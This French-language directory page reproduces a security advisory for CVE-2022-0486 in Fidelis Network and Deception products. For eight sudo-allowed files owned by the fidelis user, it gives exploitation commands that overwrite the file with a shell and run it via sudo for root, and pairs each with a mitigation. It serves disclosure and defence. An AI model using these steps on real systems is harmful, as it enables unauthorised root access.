Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-0486 — Fidelis Network and Deception - Élévation de privilèges par permissions de fichiers non sécurisées - Multiples | Kitploit
Outils/GitHubGitHub/henryreed/cve-2022-0486
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionRed TeamingExploitation de Binaires
GitHubhenryreed/cve-2022-0486

CVE-2022-0486

Fidelis Network and Deception - Élévation de privilèges par permissions de fichiers non sécurisées - Multiples

Voir le dépôt
il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Fidelis Network and Deception - CVE-2022-0486 - Élévation de privilèges par permissions de fichiers non sécurisées - Multiples

Divulgation et remerciements

Toutes les exploitations ont été approuvées pour une divulgation publique par le gouvernement des États-Unis. Un remerciement spécial aux militaires et aux agents de liaison gouvernementaux chargés d'approuver la documentation pour une distribution illimitée. Veuillez vous référer aux numéros OTR suivants :

  • OTR-2022-00482
  • OTR-2022-00483
  • OTR-2022-00484
  • OTR-2022-00485
  • OTR-2022-00486
  • OTR-2022-00488
  • OTR-2022-00489
  • OTR-2022-00490

Metadata

Date : 20220517 2005H UTC

Auteur de l'exploit : Henry Reed, The Aerospace Corporation

Page d'accueil du fournisseur : https://fidelissecurity.com/

Versions affectées :

  • Fidelis CommandPost antérieur à 9.4.5
  • Fidelis Collector antérieur à 9.4.5
  • Fidelis Sensor antérieur à 9.4.5
  • Fidelis Sandbox antérieur à 9.4.5

Testé sur :

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Internal VM) Sensor 9.4.3

CVE : CVE-2022-0486

Description CVE : Des permissions de fichiers incorrectes dans les composants CommandPost, Collector, Sensor et Sandbox de Fidelis Network and Deception permettent à un attaquant disposant d'un accès administratif local à la CLI de modifier les fichiers affectés et de permettre une élévation de privilèges équivalents à ceux de l'utilisateur root. La vulnérabilité est présente dans les versions de Fidelis Network and Deception antérieures à 9.4.5. Des correctifs et mises à jour sont disponibles pour corriger cette vulnérabilité.

Résumé

Plusieurs exploits existent sous cette CVE, car cette CVE couvre une série de permissions de fichiers incorrectes. Tous les exploits sont dus à une permission NOPASSWD et à plusieurs permissions sudoers nécessitant un mot de passe accordées à l'utilisateur fidelis sur des binaires ou scripts que l'utilisateur fidelis possède, permettant ainsi à l'utilisateur fidelis de modifier arbitrairement le fichier. Cela permet une élévation de privilèges locale.

Fichier affecté avec NOPASSWD :

  • /FSS/bin/shutdown.pl

Fichiers affectés nécessitant un mot de passe :

  • /FSS/setup/cert_mgmt
  • /FSS/bin/db_updater
  • /FSS/deception-manager/bin/deception-manager
  • /FSS/sbin/fssdbg.sh
  • /FSS/bin/mst
  • /FSS/bin/setup
  • /FSS/setup/unlock_cp_user.sh

Il est recommandé aux utilisateurs affectés de Fidelis Deception ou Fidelis Network de mettre à jour leur logiciel pour corriger cette vulnérabilité. Il est également recommandé à tous les utilisateurs, qu'ils aient été affectés ou non par cette vulnérabilité, de désactiver l'accès shell à leurs produits Fidelis après la configuration initiale.

Si, pour une raison quelconque, aucune de ces solutions n'est possible, une atténuation pour chaque fichier vulnérable est décrite dans ce document. Dans la mesure des tests de l'auteur, il semble que les utilisateurs devront utiliser l'une de ces vulnérabilités pour élever leurs privilèges avant de pouvoir appliquer les atténuations décrites. Il est donc fortement recommandé de mettre à jour Fidelis et de désactiver SSH.

Élévation de privilèges via shutdown.pl

Testé sur :

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Internal VM) Sensor 9.4.3

Résumé :

Des permissions de propriété mal configurées sur /FSS/bin/shutdown.pl permettent à l'utilisateur fidelis d'élever ses privilèges au niveau de l'utilisateur root dans plusieurs produits Fidelis. Par défaut, la configuration sudoers permet à l'utilisateur fidelis d'exécuter /FSS/bin/shutdown.pl en tant qu'utilisateur root sans demander de mot de passe. Le fichier appartient à l'utilisateur fidelis, ce qui permet à celui-ci de modifier arbitrairement le script et d'élever ses privilèges.

Exploitation :

  1. Modifier les permissions pour permettre la modification du fichier shutdown.pl :
root@kitploit:~
$ chmod 700 /FSS/bin/shutdown.pl
  1. Modifier le fichier selon les besoins pour exécuter du code arbitraire ou, dans cet exemple, ouvrir un shell :
root@kitploit:~
$ echo '#!/usr/bin/perl -w' > /FSS/bin/shutdown.pl
$ echo "exec '/bin/sh';" >> /FSS/bin/shutdown.pl
$ cat /FSS/bin/shutdown.pl
#!/usr/bin/perl -w
exec '/bin/sh';
  1. Lancer le fichier à l'aide de la commande sudo
root@kitploit:~
$ sudo /FSS/bin/shutdown.pl

Capture d'écran illustrant la découverte et l'exploitation de la vulnérabilité. Notez la ligne NOPASSWD, qui indique que shutdown.pl est un candidat potentiel pour l'élévation de privilèges :

Atténuation :

Changer les propriétaires utilisateur et groupe de /FSS/bin/shutdown.pl en root:fidelis et n'autoriser que les permissions de lecture et d'exécution pour le propriétaire du groupe de /FSS/bin/shutdown.pl atténuerait cette vulnérabilité :

Élévation de privilèges authentifiée via cert_mgmt

Testé sur :

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Internal VM) Sensor 9.4.3

Résumé :

Des permissions de propriété mal configurées sur /FSS/setup/cert_mgmt permettent à l'utilisateur fidelis d'élever ses privilèges au niveau de l'utilisateur root dans plusieurs produits Fidelis. Par défaut, la configuration sudoers permet à l'utilisateur fidelis d'exécuter /FSS/setup/cert_mgmt en tant qu'utilisateur root si un mot de passe est fourni. Le fichier appartient à l'utilisateur fidelis, ce qui permet à celui-ci de modifier arbitrairement le script et d'élever ses privilèges.

Exploitation :

  1. Modifier les permissions pour permettre la modification du fichier cert_mgmt :
root@kitploit:~
$ chmod u+w /FSS/setup/cert_mgmt
  1. Modifier le fichier selon les besoins pour exécuter du code arbitraire ou, dans cet exemple, ouvrir un shell :
root@kitploit:~
$ cp /bin/bash /FSS/setup/cert_mgmt
  1. Lancer le fichier à l'aide de la commande sudo et s'authentifier avec le mot de passe de l'utilisateur fidelis :
root@kitploit:~
$ sudo /FSS/setup/cert_mgmt

Capture d'écran illustrant la découverte et l'exploitation de la vulnérabilité :

Atténuation :

Changer les propriétaires utilisateur et groupe de /FSS/setup/cert_mgmt en root:fidelis et n'autoriser que les permissions de lecture et d'exécution pour le propriétaire du groupe de /FSS/setup/cert_mgmt atténuerait cette vulnérabilité :

Élévation de privilèges authentifiée via db_updater

Testé sur :

  • Fidelis CommandPost 9.4.3

Résumé :

Des permissions de propriété mal configurées sur /FSS/bin/db_updater permettent à l'utilisateur fidelis d'élever ses privilèges au niveau de l'utilisateur root dans Fidelis CommandPost. Par défaut, la configuration sudoers permet à l'utilisateur fidelis d'exécuter /FSS/bin/db_updater en tant qu'utilisateur root si un mot de passe est fourni. Le fichier appartient à l'utilisateur fidelis, ce qui permet à celui-ci de modifier arbitrairement le binaire et d'élever ses privilèges.

Exploitation :

  1. Modifier les permissions pour permettre la modification du fichier db_updater :
root@kitploit:~
$ chmod u+w /FSS/bin/db_updater
  1. Modifier le fichier selon les besoins pour exécuter du code arbitraire ou, dans cet exemple, ouvrir un shell :
root@kitploit:~
$ cp /bin/bash /FSS/bin/db_updater
  1. Lancer le fichier à l'aide de la commande sudo et s'authentifier avec le mot de passe de l'utilisateur fidelis :
root@kitploit:~
$ sudo /FSS/bin/db_updater

Atténuation :

Changer les propriétaires utilisateur et groupe de /FSS/bin/db_updater en root:fidelis et n'autoriser que les permissions de lecture et d'exécution pour le propriétaire du groupe de /FSS/bin/db_updater atténuerait cette vulnérabilité :

Élévation de privilèges authentifiée via deception-manager

Testé sur :

  • Fidelis CommandPost 9.4.3

Résumé :

Des permissions de propriété mal configurées sur /FSS/deception-manager/bin/deception-manager permettent à l'utilisateur fidelis d'élever ses privilèges au niveau de l'utilisateur root dans Fidelis CommandPost. Par défaut, la configuration sudoers permet à l'utilisateur fidelis d'exécuter /FSS/deception-manager/bin/deception-manager en tant qu'utilisateur root si un mot de passe est fourni. Le fichier appartient à l'utilisateur fidelis, ce qui permet à celui-ci de modifier arbitrairement le binaire et d'élever ses privilèges.

Exploitation :

  1. Modifier le fichier selon les besoins pour exécuter du code arbitraire ou, dans cet exemple, ouvrir un shell :
root@kitploit:~
$ cp /bin/bash /FSS/deception-manager/bin/deception-manager
  1. Lancer le fichier à l'aide de la commande sudo et s'authentifier avec le mot de passe de l'utilisateur fidelis :
root@kitploit:~
$ sudo /FSS/deception-manager/bin/deception-manager

Capture d'écran illustrant la découverte et l'exploitation de la vulnérabilité :

Atténuation :

Changer les propriétaires utilisateur et groupe de /FSS/deception-manager/bin/deception-manager en root:fidelis et n'autoriser que les permissions de lecture et d'exécution pour le propriétaire du groupe de /FSS/deception-manager/bin/deception-manager atténuerait cette vulnérabilité :

Élévation de privilèges authentifiée via fssdbg.sh

Testé sur :

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Internal VM) Sensor 9.4.3

Résumé :

Des permissions de propriété mal configurées sur /FSS/sbin/fssdbg.sh permettent à l'utilisateur fidelis d'élever ses privilèges au niveau de l'utilisateur root dans plusieurs produits Fidelis. Par défaut, la configuration sudoers permet à l'utilisateur fidelis d'exécuter /FSS/sbin/fssdbg.sh en tant qu'utilisateur root si un mot de passe est fourni. Le fichier appartient à l'utilisateur fidelis, ce qui permet à celui-ci de modifier arbitrairement le script et d'élever ses privilèges.

Exploitation :

  1. Modifier les permissions pour permettre la modification du fichier fssdbg.sh :
root@kitploit:~
$ chmod u+w /FSS/sbin/fssdbg.sh
  1. Modifier le fichier selon les besoins pour exécuter du code arbitraire ou, dans cet exemple, ouvrir un shell :
root@kitploit:~
$ cp /bin/bash /FSS/sbin/fssdbg.sh
  1. Lancer le fichier à l'aide de la commande sudo et s'authentifier avec le mot de passe de l'utilisateur fidelis :
root@kitploit:~
$ sudo /FSS/sbin/fssdbg.sh

Capture d'écran illustrant la découverte et l'exploitation de la vulnérabilité :

Atténuation :

Changer les propriétaires utilisateur et groupe de /FSS/sbin/fssdbg.sh en root:fidelis et n'autoriser que les permissions de lecture et d'exécution pour le propriétaire du groupe de /FSS/sbin/fssdbg.sh atténuerait cette vulnérabilité :

Élévation de privilèges authentifiée via mst

Testé sur :

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Internal VM) Sensor 9.4.3

Résumé :

Des permissions de propriété mal configurées sur /FSS/bin/mst permettent à l'utilisateur fidelis d'élever ses privilèges au niveau de l'utilisateur root dans plusieurs produits Fidelis. Par défaut, la configuration sudoers permet à l'utilisateur fidelis d'exécuter /FSS/bin/mst en tant qu'utilisateur root si un mot de passe est fourni. Le fichier appartient à l'utilisateur fidelis, ce qui permet à celui-ci de modifier arbitrairement le binaire et d'élever ses privilèges.

Exploitation :

  1. Modifier les permissions pour permettre la modification du fichier mst :
root@kitploit:~
$ chmod u+w /FSS/bin/mst
  1. Modifier le fichier selon les besoins pour exécuter du code arbitraire ou, dans cet exemple, ouvrir un shell :
root@kitploit:~
$ cp /bin/bash /FSS/bin/mst
  1. Lancer le fichier à l'aide de la commande sudo et s'authentifier avec le mot de passe de l'utilisateur fidelis :
root@kitploit:~
$ sudo /FSS/bin/mst

Capture d'écran illustrant la découverte et l'exploitation de la vulnérabilité :

Atténuation :

Changer les propriétaires utilisateur et groupe de /FSS/bin/mst en root:fidelis et n'autoriser que les permissions de lecture et d'exécution pour le propriétaire du groupe de /FSS/bin/mst atténuerait cette vulnérabilité. La capture d'écran suivante illustre l'atténuation de l'élévation de privilèges ainsi qu'un extrait de la sortie de la commande mst lorsqu'elle est exécutée par fidelis sans sudo :

Capture d'écran montrant que même avec l'atténuation, la commande peut toujours être exécutée en tant que sudo par l'utilisateur fidelis :

Capture d'écran montrant que mst ne peut pas être modifié pour exécuter d'autre code arbitraire lorsque l'atténuation est utilisée :

Élévation de privilèges authentifiée via setup

Testé sur :

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Internal VM) Sensor 9.4.3

Résumé :

Des permissions de propriété mal configurées sur /FSS/bin/setup permettent à l'utilisateur fidelis d'élever ses privilèges au niveau de l'utilisateur root dans plusieurs produits Fidelis. Par défaut, la configuration sudoers permet à l'utilisateur fidelis d'exécuter /FSS/bin/setup en tant qu'utilisateur root si un mot de passe est fourni. Le fichier appartient à l'utilisateur fidelis, ce qui permet à celui-ci de modifier arbitrairement le binaire et d'élever ses privilèges.

Exploitation :

  1. Modifier les permissions pour permettre la modification du fichier setup :
root@kitploit:~
$ chmod u+w /FSS/bin/setup
  1. Modifier le fichier selon les besoins pour exécuter du code arbitraire ou, dans cet exemple, ouvrir un shell :
root@kitploit:~
$ cp /bin/bash /FSS/bin/setup
  1. Lancer le fichier à l'aide de la commande sudo et s'authentifier avec le mot de passe de l'utilisateur fidelis :
root@kitploit:~
$ sudo /FSS/bin/setup

Capture d'écran illustrant la découverte et l'exploitation de la vulnérabilité :

Atténuation :

Changer les propriétaires utilisateur et groupe de /FSS/bin/setup en root:fidelis et n'autoriser que les permissions de lecture et d'exécution pour le propriétaire du groupe de /FSS/bin/setup atténuerait cette vulnérabilité :

Élévation de privilèges authentifiée via unlock_cp_user.sh

Testé sur :

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Internal VM) Sensor 9.4.3

Résumé :

Des permissions de propriété mal configurées sur /FSS/setup/unlock_cp_user.sh permettent à l'utilisateur fidelis d'élever ses privilèges au niveau de l'utilisateur root dans plusieurs produits Fidelis. Par défaut, la configuration sudoers permet à l'utilisateur fidelis d'exécuter /FSS/setup/unlock_cp_user.sh en tant qu'utilisateur root si un mot de passe est fourni. Le fichier appartient à l'utilisateur fidelis, ce qui permet à celui-ci de modifier arbitrairement le script et d'élever ses privilèges.

Exploitation :

  1. Modifier les permissions pour permettre la modification du fichier unlock_cp_user.sh :
root@kitploit:~
$ chmod u+w /FSS/setup/unlock_cp_user.sh
  1. Modifier le fichier selon les besoins pour exécuter du code arbitraire ou, dans cet exemple, ouvrir un shell :
root@kitploit:~
$ cp /bin/bash /FSS/setup/unlock_cp_user.sh
  1. Lancer le fichier à l'aide de la commande sudo et s'authentifier avec le mot de passe de l'utilisateur fidelis :
root@kitploit:~
$ sudo /FSS/setup/unlock_cp_user.sh

Capture d'écran illustrant la découverte et l'exploitation de la vulnérabilité :

Atténuation :

Changer les propriétaires utilisateur et groupe de /FSS/setup/unlock_cp_user.sh en root:fidelis et n'autoriser que les permissions de lecture et d'exécution pour le propriétaire du groupe de /FSS/setup/unlock_cp_user.sh atténuerait cette vulnérabilité :

Télécharger l’outil